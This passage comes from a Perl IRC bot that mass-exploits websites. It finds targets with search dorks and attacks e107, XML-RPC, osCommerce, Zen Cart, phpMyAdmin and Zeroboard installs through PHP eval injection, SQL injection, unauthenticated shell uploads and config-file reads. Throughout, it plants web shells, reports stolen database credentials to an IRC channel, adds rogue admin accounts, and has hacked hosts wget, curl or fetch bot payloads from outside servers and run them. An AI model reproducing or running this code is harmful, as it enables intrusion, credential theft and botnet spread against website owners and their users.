my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
my $html = &e107_rce_query($test,$code);
if ($html =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) {
&e107xpl1($chan,$site,$engine);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
my $upload = 'if(@copy("'.$injector.'","images.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","cukz.php");@copy("'.$botshell2.'","detu.php");} elseif(@copy("'.$injector.'","e107_themes/images.php")) { echo "ewec_dthem";@copy("'.$botshell.'","e107_themes/cukz.php");@copy("'.$botshell2.'","e107_themes/detu.php");} elseif(@copy("'.$injector.'","e107_plugins/images.php")) { echo "ewec_dplug";@copy("'.$botshell.'","e107_plugins/cukz.php");@copy("'.$botshell2.'","e107_plugins/detu.php");} elseif(@copy("'.$injector.'","e107_images/images.php")) { echo "ewec_dima";@copy("'.$botshell.'","e107_images/cukz.php");@copy("'.$botshell2.'","e107_images/detu.php");}';
my $res = &e107_rce_query($test,encode_base64($upload));
if ($res =~ /c0liSUKSESc0li/) {
&get_content("http://".$site."cukz.php");
&get_content("http://".$site."detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
elsif ($res =~ /ewec_dthem/) {
&get_content("http://".$site."e107_themes/cukz.php");
&get_content("http://".$site."e107_themes/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_themes/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_themes/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
elsif ($res =~ /ewec_dplug/) {
&get_content("http://".$site."e107_plugins/cukz.php");
&get_content("http://".$site."e107_plugins/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_plugins/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_plugins/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
elsif ($res =~ /ewec_dima/) {
&get_content("http://".$site."e107_images/cukz.php");
&get_content("http://".$site."e107_images/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_images/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_images/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
&e107_spread_query($test);
sleep(2);
} exit; } sleep(2);
}
elsif ($html =~ /v0pCr3w
sys:(.+?)
/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
my $upload = 'if(@copy("'.$injector.'","images.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","cukz.php");@copy("'.$botshell2.'","detu.php");} elseif(@copy("'.$injector.'","e107_themes/images.php")) { echo "ewec_dthem";@copy("'.$botshell.'","e107_themes/cukz.php");@copy("'.$botshell2.'","e107_themes/detu.php");} elseif(@copy("'.$injector.'","e107_plugins/images.php")) { echo "ewec_dplug";@copy("'.$botshell.'","e107_plugins/cukz.php");@copy("'.$botshell2.'","e107_plugins/detu.php");} elseif(@copy("'.$injector.'","e107_images/images.php")) { echo "ewec_dima";@copy("'.$botshell.'","e107_images/cukz.php");@copy("'.$botshell2.'","e107_images/detu.php");}';
my $res = &e107_rce_query($test,encode_base64($upload));
if ($res =~ /c0liSUKSESc0li/) {
&e107xpl1($chan,$site,$engine);
&get_content("http://".$site."cukz.php");
&get_content("http://".$site."detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4images.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
if ($res =~ /ewec_dthem/) {
&get_content("http://".$site."e107_themes/cukz.php");
&get_content("http://".$site."e107_themes/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."e107_themes/4images.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
if ($res =~ /ewec_dplug/) {
&get_content("http://".$site."e107_plugins/cukz.php");
&get_content("http://".$site."e107_plugins/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."e107_plugins/4images.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
if ($res =~ /ewec_dima/) {
&get_content("http://".$site."e107_images/cukz.php");
&get_content("http://".$site."e107_images/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."e107_images/4images.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
} exit; } sleep(2);
}
}
}
}

sub e107_rce_query() {
my $url = $_[0];
my $code = $_[1];
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
return $res->content;
}

sub e107_spread_query() {
my $url = $_[0];
my $code = "7ZPfasIwFMbvB3uHGAamMqv7c2XnEPYAe4FBadMTW5cmIUmtMnz3JWmrDASZsLvdpef7vt85JKdAS4nwdq7e9FP7kutXnNzeQCiavVngWJUqbURWA4liPBjuaF0scbAJmc+LvU8ntEAzW6tE12iqGSqkjidoEm/UOp4kDCwtUWmtWsxmn1Jbl46pmOW58SHvSlwvNJx7yPDZrsFen6aN5mj6fj2At2payFZwmRW/oPgb2Wb6/1Z+UMIGgYF1U/k9gh3x+xQlYZ9OgnOxRlBbSYGCh0H05ZIaDFqi8djpFUNkBLWy+072esXIEEthVxlryBh2QMdBXfljMN97UJQcgRtZCYI/BD4KB/cncAPngKYEztMTtmesTvVuoAuUvbFQ94PJPDU205b40KqTjpCB70zuyVMqhQXhEMHriiCKlHLIBLnQUmXG2FI3Z5sO4h+0lQpEf1XME0OhewessU+3ZcWBjFYMJOtfE32hMEHsAkxDVnSBh/njc5Sgg5+YcmmA3LHQ31U02EaLEPOVbw==";
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
}

sub xml() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$xmllogo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
my $vuln = "http://".$site."13".$bug;
my $html = &get_content($test);
if ($html =~ /faultCode/ ) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $resp = &xml_cek_query($test);
if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
&xml_spread_query($test);sleep(2);
my $sys = $1;
my $check = &get_content("http://".$site."images.php");
&get_content("http://".$site."cukz.php");
&get_content("http://".$site."detu.php");
if ($check =~ /ZITH/) {
&msg("$chan","$xmllogo4$engine 9SheLL 13 http://".$site."7images.php 3".$sys);&get_content("http://".$site."cukz.php"); sleep(2);}
else {
&msg("$chan","$xmllogo 4$engine 11checking.. 7 ".$vuln." 3".$sys); sleep(2);}
}
sleep(2); } exit; } }
}
}
}

sub xml_cek_query() {
my $url = $_[0];
my $code = "system('uname -a');";
my $ua = LWP::UserAgent->new(agent => 'perl post');
$exploit = "";
$exploit .= "test.method";
$exploit .= "',''));";
$exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*";
$ua->timeout(7);
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
return $res->content;
}

sub xml_spread_query() {
my $xmltargt = $_[0];
my $xmlsprd = "system('wget ".$injector." -O images.php;fetch ".$injector.";mv ewec.jpg images.php;wget ".$botshell." -O cukz.php;fetch ".$botshell.";mv lovie.jpg cukz.php;wget ".$botshell2." -O detu.php;fetch ".$botshell2.";mv logi.jpg detu.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;wget ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;curl -O ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;lwp-download ".$botshell.";php lovie.jpg;fetch ".$botshell2.";php logi.jpg;rm -rf logi.jpg;wget ".$botshell2.";php logi.jpg;rm -rf logi.jpg;curl -O ".$botshell2.";php logi.jpg;rm -rf logi.jpg;lwp-download ".$botshell2.";php logi.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;wget ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;curl -O ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;lwp-download ".$botshell.";php lovie.jpg;fetch ".$botshell2.";php logi.jpg;rm -rf logi.jpg;wget ".$botshell2.";php logi.jpg;rm -rf logi.jpg;curl -O ".$botshell2.";php logi.jpg;rm -rf logi.jpg;lwp-download ".$botshell2.";php logi.jpg;');";
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "";
$exploit .= "test.method";
$exploit .= "',''));";
$exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*";
$userAgent->timeout(7);
$userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
}

sub sql() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$sqllogo(7@2$engine15)10 Scan finish"); }
my $test = "http://".$site.$bug."'";
my $vuln = "http://".$site."4".$bug;
my $sqlsite = "http://".$site.$bug;
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
&sqlbrute($sqlsite,$chan,$engine);}
elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
&msg("$chan","$sqllogo(7@2$engine15)15(7@2MsSQL15)13 ".$vuln);}
elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
&msg("$chan","$sqllogo(7@2$engine15)15(7@2MsAccess15)13 ".$vuln);}
elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
&sqlbrute($sqlsite,$chan,$engine);}
} exit; sleep(2); }
}
}
}
sub sqlbrute() {
my $situs=$_[0];
my $chan =$_[1];
my $engine=$_[2];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
$inyection = '';
$union = '';
}
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
{
$column ++;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
&msg("$chan","$sqllogo(7@2$engine15)15(7@2SQL15)13 $sql ");
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
{
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
&msg("$chan","$sqllogo(7@2$engine15)15(7@2SQL15)(7@13INFO_SCHEMA15)13 $sql ");
}
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
&msg("$chan","$sqllogo(7@2$engine15)15(7@2SQL15)(4@13USER15)13 $sql ");
}
else
{
}
while ($loadcont 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oscologo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/file_manager.php/login.php";
my $test2 = "http://".$site."admin/banner_manager.php/login.php";
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ ) {
&msg("$chan","$oscologo 3$engine 11checking... 7 ".$test);
&osco_xpl($test,$chan,$site,$engine);
&osco2($test1,$chan,$bug,$dork,$engine);
&osco_xpl3($test2,$chan,$site,$engine);
&osql($chan,$site,$engine);
} else { }
} exit; sleep(2); }
}
}
}

sub osco_xpl() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?cPath=&action=new_product_preview";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $res = $browser->post( $url,['products_image' => ['./ewec.jpg' => 'sonor.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['products_image' => ['./ikal.jpg' => 'shure.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['products_image' => ['./lovie.jpg' => 'cukz.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['products_image' => ['./logi.jpg' => 'detu.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $check = &get_content("http://".$site."images/shure.php");&get_content("http://".$site."images/cukz.php");&get_content("http://".$site."images/detu.php");sleep(3);
if ($check =~ /ZITH/) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
&msg("$admin","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
}
}

sub osco2() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oscologo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/banner_manager.php/login.php";
my $test2 = "http://".$site."admin/categories.php/login.php";
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /TABLE_HEADING_FILENAME/) {
&msg("$chan","$oscologo 3$engine 11checking... 7 ".$test);
&osco_xpl2($test,$chan,$site,$engine);
&osco_xpl3($test1,$chan,$site,$engine);
&osco_xpl($test2,$chan,$site,$engine);
&osql($chan,$site,$engine);
} else { }
} exit; sleep(2); }
}
}
}

sub osco_xpl2() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?action=processuploads";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $res = $browser->post( $url,['file_1' => ['./ewec.jpg' => 'sonor.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['file_1' => ['./ikal.jpg' => 'shure.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['file_1' => ['./lovie.jpg' => 'cukz.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['file_1' => ['./logi.jpg' => 'detu.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $check = &get_content("http://".$site."images/shure.php");&get_content("http://".$site."images/cukz.php");&get_content("http://".$site."images/detu.php");sleep(3);
if ($check =~ /ZITH/) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
&msg("$admin","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
}
}

sub osco3() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oscologo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/file_manager.php/login.php";
my $test2 = "http://".$site."admin/categories.php/login.php";
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /TABLE_HEADING_BANNERS/) {
&msg("$chan","$oscologo 3$engine 11checking... 7 ".$test);
&osco_xpl3($test,$chan,$site,$engine);
&osco_xpl2($test1,$chan,$site,$engine);
&osco_xpl($test2,$chan,$site,$engine);
&osql($chan,$site,$engine);
} else { }
} exit; sleep(2); }
}
}
}
sub osco_xpl3() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?action=insert";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $res = $browser->post( $url,['banners_image' => ['./ewec.jpg' => 'sonor.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['banners_image' => ['./ikal.jpg' => 'shure.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['banners_image' => ['./lovie.jpg' => 'cukz.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['banners_image' => ['./logi.jpg' => 'detu.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $check = &get_content("http://".$site."images/shure.php");&get_content("http://".$site."images/cukz.php");&get_content("http://".$site."images/detu.php");sleep(3);
if ($check =~ /ZITH/) {
my $safe ="";
my $os ="";
my $free ="";
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
&msg("$chan","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
&msg("$admin","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
}
}
sub osql() {
my $chan = $_[0];
my $site = $_[1];
my $engine = $_[2];
my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
sub oscoQ() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$ossqllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$ossqllogo 4$engine 0 Scan finish"); }
my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}
}
}

sub e107xpl1() {
my $chan = $_[0];
my $site = $_[1];
my $engine = $_[2];
my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
&osql_xpl($test,$chan,$site);
}
}

sub e107xpl() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$e107logosql);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$e107logosql 4$engine 0 Scan finish"); }
my $test = "http://".$site."e107_plugins/my_gallery/image.php?file=../../e107_config.php";
my $re = &get_content($test);
if ($re =~ /http:\/\//){
# &msg("$chan","$e107logosql 4$engine 9checking.. 11 ".$test);
&e107_cuk($test,$chan,$site);
}
}
}
}
sub e107_cuk() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $request = HTTP::Request->new(GET=>$url);
my $browser = LWP::UserAgent->new();
$browser->timeout(10);
my $response = $browser->request($request);
if ($response->is_success) {
my $res = $response->as_string;
if ($res =~ m/mySQLserver = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 13[+]DB Server: 3 $1");
}
if ($res =~ m/mySQLuser = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 13[+]DB username: 3 $1");
}
if ($res =~ m/mySQLpassword = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 13[+]DB password: 3 $1");
}
if ($res =~ m/mySQLdefaultdb = '(.*)'/g) {
&msg("$chan","$e107logosql (4@3VULN)9 http://".$site." 13[+]DB database: 3 $1");
}
}
}
sub adm() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$admlogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$admlogo 4$engine 0 Scan finish"); }
my $test = "http://".$site."phpMyAdmin/config/config.inc.php?c=id";
my $vuln = "http://".$site."phpMyAdmin/config/config.inc.php?c=";
my $re = &get_content($test);
if ($re =~ /$adm_output/){
&msg("$chan", "$admlogo(4@3$engine15)(4@13VulN15)13 ".$vuln."15(4@0OKE15)");
}
}
}
}

sub op() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oplogo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$open_test;
my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
my $re = &get_content($test);
if ($re =~ /$open_output/){
&msg("$chan", "$oplogo(4@3$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
}
}
}
}

sub zen() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$zenlogo 4$engine 0 Scan finish"); }
my $test = "http://".$site."admin/sqlpatch.php/password_forgotten.php?action=execute";
my $html = &get_content($test);
if ($html =~ /zc_install/){
&zen_query($chan,$site,$test);
}
}
}
}
sub zen_query() {
my $chan = $_[0];
my $url = $_[1];
my $test = $_[2];
my $code = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (2283,'abc','localhost','617ec22fbb8f201c366e9848c0eb6925:87');";
my $req = HTTP::Request->new(POST => $test);
$req->content_type("application/x-www-form-urlencoded");
$req->content("query_string=".$code);
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(3);
my $res = $ua->request($req);
my $data = $res->as_string;
if ( $data =~ /1 statements processed/i ) {
&msg("$chan","$zenlogo(4@9VulN15)3 http://".$url."4admin/login.php 15(4@9user15)0 abc 15(4@9pass15)0 wew");
&msg("$admin","$zenlogo(4@9VulN15)3 http://".$url."4admin/login.php 15(4@9user15)0 abc 15(4@9pass15)0 wew");
}
elsif ( $data =~ /Duplicate entry/ ) {
&msg("$chan","$zenlogo(4@9SuCcEs15)12 http://".$url."3admin/login.php 15(4@9user15)10 abc 15(4@9pass15)10 wew");
&msg("$admin","$zenlogo(4@9SuCcEs15)12 http://".$url."3admin/login.php 15(4@9user15)10 abc 15(4@9pass15)10 wew");
}
}

######################################### Untuk Scann Zeroo Board #######
sub zboard() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$zerologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$zerologo 4$engine 0 Scan finish"); }
my $reslx = "http://".$site.$bug;
my $crot = &get_content($reslx);

if ($crot =~ /Zeroboard/) {
my $sc = system("./zero $reslx 80");sleep(2);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $check = &get_content("http://".$site."/data/shell.php");
if ($check =~ /Cannot execute a blank command/) {
my $dark = &get_content("http://".$site."/data/shell.php?cmd=uname%20-a");
&msg("$chan","$zerologo 4$engine 11Checking... http://".$site."/data/shell.php?cmd=uname%20-a Uname: $dark");
my $bxx = &get_content("http://".$site."/data/shell.php?cmd=lwp-download%20http://www.daisychainwiltshire.co.uk/images/ewec.jpg;mv%ewec.jpg%20dede.php;wget%20http://www.daisychainwiltshire.co.uk/images/ewec.jpg;mv%ewec.jpg%20dede.php;wget%20http://www.daisychainwiltshire.co.uk/images/ewec.jpg;mv%ewec.jpg%20dede.php");
my $bx1 = &get_content("http://".$site."/data/shell.php?cmd=lwp-download http://174.142.75.147/~ajeterb/images/ewec.php;mv%20ewec.txt%20bs.php;wget http://174.142.75.147/~ajeterb/images/ewec.php;mv%20ewec.txt%20ewec.php");
my $bxc = &get_content("http://".$site."/data/ewec.php");
my $vuln1 = "http://".$site."/data/dede.php";
my $vuln2 = "http://".$site."/bbs//data/dede.php";
my $vuln3 = "http://".$site."/zero_board/data/dede.php";
my $vuln4 = "http://".$site."/zb41/data/dede.php";
my $vuln5 = "http://".$site."/zb/data/dede.php";
my $vuln6 = "http://".$site."/board2/data/dede.php";
my $vuln7 = "http://".$site."/zboard//data/dede.php";
my $vuln8 = "http://".$site."/zeroboard//data/dede.php";
my $vuln9 = "http://".$site."/board//data/dede.php";

my $check = &get_content($vuln1);
if ( $check =~ /ZITH/i ) {
my $safe ="";
my $os ="";
my $free ="";
